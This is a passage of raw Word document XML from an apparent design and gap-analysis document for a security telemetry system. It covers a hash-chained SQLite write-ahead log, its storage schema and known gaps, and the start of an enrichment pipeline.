            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FEF5E7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81902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P1</w:t>
            </w:r>
          </w:p>
        </w:tc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45916" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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Dedup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collision</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="7581606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23797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EB-04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B6715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No per-agent rate limiting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FEF5E7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E788F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P1</w:t>
            </w:r>
          </w:p>
        </w:tc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3B707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Rogue agent starves</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="00A4690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C5FF3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EB-05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9FC51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Metrics endpoint unprotected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FEF5E7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17FD2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P2</w:t>
            </w:r>
          </w:p>
        </w:tc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197AC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Info leakage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="0C3A98F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E9061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EB-06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5BAB8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Health endpoint unauthenticated</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FEF5E7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91636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P2</w:t>
            </w:r>
          </w:p>
        </w:tc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5E8A3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Status disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F0A4CB0" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="092CCE70" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="400" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Chapter 4: WAL Layer (Phase 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F851A4" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>4.1 Hash Chain — The Core Integrity Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F60C7D6" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Formula: sig[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>] = BLAKE2b(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>envelope_bytes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">] || sig[i-1]). Genesis: sig[0] uses </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>prev_sig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 0x00 × 32. The hash chain ensures insertion, deletion, reordering, and replay protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDF2C9D" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>4.2 WAL Write Sequence</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders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  <w:insideH w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
          <w:insideV w:val="single" w:sz="6" w:space="1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5"/>
        <w:gridCol w:w="2305"/>
        <w:gridCol w:w="2222"/>
        <w:gridCol w:w="3808"/>
      </w:tblGrid>
      <w:tr w:rsidR="00501EAB" w14:paraId="1F3C266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1B2A4A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F7500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Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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86567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Operation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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7098C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Code Ref</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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5ED43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Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="2B6BB68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99854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5ABBA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Compute BLAKE2b checksum</w:t>
            </w:r>
          </w:p>
        </w:tc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9D6EA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wal_sqlite.py:145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68868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hashlib.blake2b(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env_bytes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>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="2F0DD28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53998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2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F680B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Acquire threading lock</w:t>
            </w:r>
          </w:p>
        </w:tc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73015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wal_sqlite.py:146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C7769" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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RLock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for chain atomicity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="0A4AFB5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38281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3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25E70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Get previous signature</w:t>
            </w:r>
          </w:p>
        </w:tc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DC4C7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wal_sqlite.py:147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2FB2E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 xml:space="preserve">SELECT sig FROM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wal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DESC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="25CCCD1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8F418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4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94576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Compute chain signature</w:t>
            </w:r>
          </w:p>
        </w:tc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AACBD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wal_sqlite.py:148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1A5A7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BLAKE2b(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env_bytes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>||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prev_sig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>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="7E9FF6D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4A187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5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59E66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INSERT into SQLite</w:t>
            </w:r>
          </w:p>
        </w:tc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A672E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wal_sqlite.py:150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5050E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INSERT with integrity fields</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="1CCB435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ED4E7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6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A808D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Handle duplicate</w:t>
            </w:r>
          </w:p>
        </w:tc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28ADF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wal_sqlite.py:154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66B33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 xml:space="preserve">Return False on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IntegrityError</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3CE43DB3" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00501EAB">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1FC51F" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>4.3 Storage Schema Summary</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders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  <w:insideH w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
          <w:insideV w:val="single" w:sz="6" w:space="1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7"/>
        <w:gridCol w:w="2242"/>
        <w:gridCol w:w="3102"/>
        <w:gridCol w:w="1619"/>
      </w:tblGrid>
      <w:tr w:rsidR="00501EAB" w14:paraId="63D0FD9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1B2A4A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A0443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Table</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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25B8D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Key Columns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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F0891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Integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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85C13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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="3634B98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EB55B" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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wal</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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05E91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id, idem(UNIQUE), bytes, checksum, sig</w:t>
            </w:r>
          </w:p>
        </w:tc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8B9D7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 xml:space="preserve">Hash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chain+checksum</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc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E4CCA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Transient queue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="7E3921E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D2E5B" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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wal_dead_letter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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81E25" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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row_id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error_msg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envelope_bytes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc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9370D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None</w:t>
            </w:r>
          </w:p>
        </w:tc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1BDBF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Quarantine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="777C9AF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75D42" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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process_events</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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196DA" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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device_id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pid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, exe,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ts_ns</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc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4F5FF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UNIQUE(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device_id,pid,ts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>)</w:t>
            </w:r>
          </w:p>
        </w:tc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E1871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Process telemetry</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="57B423D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1CF80" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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security_events</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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205D8" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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device_id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event_category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risk_score</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc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6E69E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None</w:t>
            </w:r>
          </w:p>
        </w:tc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A2041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Security alerts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="741C01E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F10B2" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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flow_events</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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05B9A" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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device_id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src_ip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dst_ip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>, protocol</w:t>
            </w:r>
          </w:p>
        </w:tc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6DBBE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UNIQUE per conn</w:t>
            </w:r>
          </w:p>
        </w:tc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8D5B8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Network flows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="1216C7E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20A1A" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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device_telemetry</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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A8C25" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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device_id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ip_address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device_type</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc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F354C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UNIQUE(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device_id,ts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>)</w:t>
            </w:r>
          </w:p>
        </w:tc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C4D86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Device metrics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="3769AC9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FA191" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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dns_events</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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5F770" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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device_id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, domain,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query_type</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc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273A2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UNIQUE per query</w:t>
            </w:r>
          </w:p>
        </w:tc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ACF90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DNS queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="711EC6C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FF30D" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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lastRenderedPageBreak/>
              <w:t>audit_events</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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C28C4" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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device_id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syscall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pid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>, exe</w:t>
            </w:r>
          </w:p>
        </w:tc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4C863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None</w:t>
            </w:r>
          </w:p>
        </w:tc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847FF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Kernel audit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="58C69AC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D4CB0" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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persistence_events</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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3C7D7" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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device_id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>, mechanism, path</w:t>
            </w:r>
          </w:p>
        </w:tc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65D05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None</w:t>
            </w:r>
          </w:p>
        </w:tc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B6175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Boot persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="4FB433B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C6C87" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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fim_events</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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C65A4" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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device_id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, path,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change_type</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc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3FBF3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None</w:t>
            </w:r>
          </w:p>
        </w:tc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57C09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File integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="09E3382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0FA80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incidents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6E67B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title, severity, status</w:t>
            </w:r>
          </w:p>
        </w:tc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4B854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None</w:t>
            </w:r>
          </w:p>
        </w:tc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03878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Incident tracking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6CEDDA80" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00501EAB">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BE45263" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>4.4 WAL Gaps</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders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  <w:insideH w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
          <w:insideV w:val="single" w:sz="6" w:space="1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8"/>
        <w:gridCol w:w="3376"/>
        <w:gridCol w:w="1841"/>
        <w:gridCol w:w="2915"/>
      </w:tblGrid>
      <w:tr w:rsidR="00501EAB" w14:paraId="35DF4CE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1B2A4A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9A3C5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ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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C5D2A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Gap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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EC842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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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57390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Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="562BA77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621D8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WAL-01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D32D5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No maximum backlog age</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FEF5E7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40DA3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P1</w:t>
            </w:r>
          </w:p>
        </w:tc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C1481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Stale events processed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="56050B1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3DA17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WAL-02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29319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No circuit breaker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FEF5E7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211C0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P1</w:t>
            </w:r>
          </w:p>
        </w:tc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FF3B4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Retry storms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="6DC1C68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7753B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WAL-03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92648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Chain break count not exported</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FEF5E7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E8DCB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P1</w:t>
            </w:r>
          </w:p>
        </w:tc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28555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Tampering invisible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="517122F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9E8CF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WAL-04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516DA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Schema version not validated</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FEF5E7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A983D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P2</w:t>
            </w:r>
          </w:p>
        </w:tc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F3D58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Version drift</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="4FE0DD6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87C28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WAL-05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FFD78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VACUUM locks DB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FEF5E7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BD6DC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P2</w:t>
            </w:r>
          </w:p>
        </w:tc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E8FD6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Processing stall</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0099CDE0" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="277BB29D" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="400" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Chapter 5: Enrichment (Phase 4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7FF944" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>5.1 Pipeline Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8A8EF0" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Raw </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attrs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dict</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0D9A7EA2" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoIP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>geo_src_country</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>geo_src_city</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>geo_src_lat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>geo_src_lon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7AF8C079" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  → ASN: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>asn_src_number</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>asn_src_org</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>asn_src_network_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="33FCE7EE" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ThreatIntel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>threat_intel_match</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>threat_source</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>threat_severity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="085A669D" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  → Return enriched </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attrs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0F1F3DA6" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t>Status: 'enriched' (all OK), 'partial' (some failed), 'raw' (all failed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8CCE04" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>5.2 Enrichment Mutation Map</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders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  <w:insideH w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
          <w:insideV w:val="single" w:sz="6" w:space="1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4"/>
        <w:gridCol w:w="2048"/>
        <w:gridCol w:w="2633"/>
        <w:gridCol w:w="2925"/>
      </w:tblGrid>
      <w:tr w:rsidR="00501EAB" w14:paraId="6BD2F2D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1B2A4A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83896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Enricher</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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F90C3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Input</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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13A24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Output Fields</w:t>
            </w:r>
          </w:p>
        </w:tc>
